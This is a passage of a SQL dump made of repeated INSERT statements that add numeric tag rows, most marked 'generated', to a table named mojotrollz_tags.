'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10435, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10435, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10435, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10436, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10436, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10436, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10437, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10437, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10437, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10438, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10438, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10438, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10439, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10440, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10440, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10440, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10442, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10442, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10445, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10445, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10447, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10447, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10447, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10455, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10455, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10456, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10460, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10461, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10463, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10463, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10463, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10464, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10464, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10464, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10467, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10468, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10468, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10469, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10469, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10470, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10470, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10471, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10471, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10472, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10472, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10475, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10475, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10476, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10476, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10477, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10477, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10478, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10478, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10479, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10480, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10481, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10482, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10482, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10485, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10486, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10486, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10487, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10487, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10488, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10488, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10489, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10489, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10491, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10491, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10495, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10495, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10497, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10498, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10498, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10499, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10499, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10500, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10500, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10502, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10502, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10503, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10503, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10504, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10504, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10505, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10505, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10506, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10507, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10507, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10508, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10508, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10509, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10509, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10509, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10516, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10536, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10537, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10537, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10538, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10539, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10539, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10540, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10540, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10540, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10540, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10540, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10540, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10541, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10541, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10556, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10556, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10558, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10558, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10558, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10559, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10559, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10577, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10578, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10578, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10579, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10580, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10580, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10581, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10582, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10582, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10583, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10583, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10584, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10596, 1, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10596, 1, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10596, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10599, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10599, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10600, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10600, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10601, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10602, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10604, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10604, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10605, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10605, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10606, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10608, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10608, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10610, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10610, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10611, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10611, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10612, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10612, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10616, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10617, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10617, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10618, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10618, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10619, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10619, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10636, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10636, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10636, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10636, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10636, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10637, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10637, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10638, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10638, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10639, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10639, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10640, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10640, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10641, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10641, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10642, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10642, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10643, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10643, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10644, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10644, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10645, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10645, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10646, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10646, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10647, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10647, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10648, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10648, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10658, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10659, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10660, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10661, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10662, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10662, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10663, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10663, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10664, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10664, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10665, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10665, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10666, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10667, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10668, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10676, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10676, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10676, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10676, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10676, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10678, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10680, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10681, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10682, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10682, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (10682, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 